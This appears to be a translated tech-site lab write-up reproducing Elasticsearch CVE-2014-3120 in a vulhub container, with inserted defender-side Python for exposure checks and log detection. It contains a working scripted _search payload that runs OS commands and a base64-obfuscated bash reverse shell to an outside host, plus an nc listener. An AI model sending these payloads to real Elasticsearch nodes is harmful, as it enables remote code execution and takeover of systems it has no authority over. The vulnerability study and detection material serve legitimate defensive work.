2025-01-19 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
This article explains how to reproduce the ElasticSearch remote code execution vulnerability CVE-2014-3120. The editor considers it very practical and shares it here in the hope that you get something out of it. Without further ado, read on.
Elasticsearch is a Lucene-based search server. It provides a distributed, multi-user full-text search engine behind a RESTful web interface. Developed in Java and released as open source under the Apache license, it is a popular enterprise search engine.
ElasticSearch can run scripts, which makes it convenient to post-process query results. The scripting engine it uses is MVEL, which has no sandbox, so a script can run arbitrary code directly. In this version of ElasticSearch, dynamic scripting is enabled by default, so a user can run arbitrary code simply by sending an HTTP request.
ElasticSearch version: v1.1.1
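Two checks an operator can run before anything else, as an added example that is not part of the original article: the first reads the JSON banner served on port 9200 and reports whether the node predates 1.2.0 (the first release in which dynamic scripting was disabled by default), the second reads elasticsearch.yml and reports whether script.disable_dynamic: true has been set, the mitigation for 1.x nodes. The banner and config texts below are constructed samples, not output captured from a real node.

```python
# Added example, not part of the original article: two defender-side checks for
# CVE-2014-3120 on an Elasticsearch 1.x node, using data an operator already has,
# the JSON banner served on port 9200 and the node's elasticsearch.yml.
import json


def parse_version(version_str):
    """Turn '1.1.1' (or a pre-release like '1.2.0-beta1') into an int tuple."""
    core = version_str.split("-")[0]
    return tuple(int(part) for part in core.split("."))


def version_has_unsafe_default(banner_json):
    """True when the reported version is older than 1.2.0, the first release in
    which dynamic scripting (script.disable_dynamic) defaulted to disabled."""
    banner = json.loads(banner_json)
    return parse_version(banner["version"]["number"]) < (1, 2, 0)


def dynamic_scripting_disabled(elasticsearch_yml):
    """True only if elasticsearch.yml explicitly sets script.disable_dynamic: true.
    Commented-out lines do not count; a missing key means the version default applies."""
    for line in elasticsearch_yml.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        key, sep, value = stripped.partition(":")
        if sep and key.strip() == "script.disable_dynamic":
            return value.strip().strip("\"'").lower() == "true"
    return False


def exposed_to_cve_2014_3120(banner_json, elasticsearch_yml):
    """A node is exposed when its version still enables dynamic scripting by
    default and the configuration does not turn it off."""
    return version_has_unsafe_default(banner_json) and not dynamic_scripting_disabled(elasticsearch_yml)


# Constructed sample data (not captured from a real node): a banner shaped like
# the root response of the 1.1.1 node in the article, and two config variants.
SAMPLE_BANNER = json.dumps({
    "status": 200,
    "name": "example-node",
    "version": {"number": "1.1.1", "lucene_version": "4.7"},
    "tagline": "You Know, for Search",
})
SAMPLE_YML_DEFAULT = "cluster.name: demo\n# script.disable_dynamic: true\n"
SAMPLE_YML_HARDENED = "cluster.name: demo\nscript.disable_dynamic: true\n"

if __name__ == "__main__":
    for label, yml in (("default config", SAMPLE_YML_DEFAULT), ("hardened config", SAMPLE_YML_HARDENED)):
        print(label, "exposed:", exposed_to_cve_2014_3120(SAMPLE_BANNER, yml))
```

The version check alone is not enough: an upgraded node whose administrator re-enabled dynamic scripting is just as exposed, which is why the config check is combined with it.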
This is only a record of reproducing the vulnerability; the process is as follows:
1. Building the vulnerable environment
The vulnerability environment in this article is built with vulhub. Execute the following command to open the environment.
cd elasticsearch/CVE-2014-3120
docker-compose build
docker-compose up -d
After it starts, access port 9200; it displays as follows.
Vulnerability link: http://192.168.101.152:9200/
2. Vulnerability exploitation process
To exploit this vulnerability, at least one document must exist in ElasticSearch first. Send the following request to add one:
POST /website/blog/ HTTP/1.1
Host: 192.168.91.130:9200
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 27

{
  "name": "colleget"
}
A 201 status code indicates the document was added. Then send the following request to execute a command:
POST /_search?pretty HTTP/1.1
Host: 192.168.91.130:9200
Content-Type: application/x-www-form-urlencoded
Content-Length: 366

{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "script_fields": {
    "command": {
      "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
    }
  }
}
The command output is echoed in the response. Next comes a reverse shell; a script was written for convenience.
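Detection logic for the scripted _search request above, as an added example that is not part of the original article: it walks each request body for inline "script" values, raises a notice when dynamic scripting is in use at all, and an alert when the script text reaches into the JVM the way the command-execution payload does. The request-log format ("src_ip METHOD path body", with "-" for an empty body) is an assumption, as is the reverse proxy in front of port 9200 that would produce it; the three log lines are constructed.

```python
# Added example, not part of the original article: detection logic for the
# scripted _search request shown above, run over constructed request-log lines.
# Assumption: requests are captured by a reverse proxy in front of port 9200 in
# an invented "src_ip METHOD path body" format, with "-" for an empty body.
import json
import re

# Script text that reaches into the JVM instead of doing field arithmetic.
_JVM_INDICATORS = re.compile(
    r"Runtime\.getRuntime|\.exec\s*\(|ProcessBuilder|java\.io\.|java\.lang\.|"
    r"java\.util\.Scanner|java\.net\."
)


def find_scripts(node, path="$"):
    """Yield (json_path, script_text) for every string-valued 'script' key,
    wherever it sits in the body (script_fields, sort, facets, ...)."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "script" and isinstance(value, str):
                yield child, value
            else:
                yield from find_scripts(value, child)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_scripts(value, f"{path}[{index}]")


def classify_request(path, body):
    """Return (verdict, reason): 'alert' for JVM access in an inline script,
    'notice' for any other dynamic script or an unparseable body, else 'ok'.
    Elasticsearch 1.x accepts search bodies on GET as well, so the method is ignored."""
    if "_search" not in path or body == "-":
        return "ok", "no scripted search body"
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return "notice", "unparseable body on a _search endpoint"
    scripts = list(find_scripts(parsed))
    if not scripts:
        return "ok", "search without inline scripts"
    for json_path, text in scripts:
        if _JVM_INDICATORS.search(text):
            return "alert", f"JVM access in inline script at {json_path}"
    return "notice", f"{len(scripts)} inline script(s) (dynamic scripting in use)"


def analyze_log(log_text):
    """Classify each request line; returns (src_ip, verdict, reason) in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src_ip, _method, path, body = line.split(" ", 3)
        findings.append((src_ip, *classify_request(path, body)))
    return findings


# Constructed sample log: a plain query, a legitimate arithmetic script, and
# the command-execution script from the request above.
SAMPLE_LOG = r"""
10.0.0.5 GET /website/blog/_search?q=name:colleget -
10.0.0.5 POST /website/blog/_search {"query":{"match_all":{}},"script_fields":{"double_price":{"script":"doc['price'].value * 2"}}}
10.0.0.9 POST /_search?pretty {"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"command":{"script":"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}}
"""

if __name__ == "__main__":
    for src_ip, verdict, reason in analyze_log(SAMPLE_LOG):
        print(f"{src_ip:<10} {verdict:<7} {reason}")
```

The "notice" level is deliberate: on a 1.1.1 node any inline script is a sign that dynamic scripting is enabled, so the benign arithmetic script is worth knowing about even though it is not an attack.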
First obtain a domain name on dnslog, then run a command to confirm that the target can reach the Internet.
Then run nc -lvvp 1234 on the server to listen on the port, and execute the command:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
After a moment the shell connects back to the server.
The above is the analysis of how to reproduce the ElasticSearch remote code execution vulnerability CVE-2014-3120. The editor believes it contains points that may come up in daily work, and hopes you have learned something from it. For more details, please follow the industry information channel.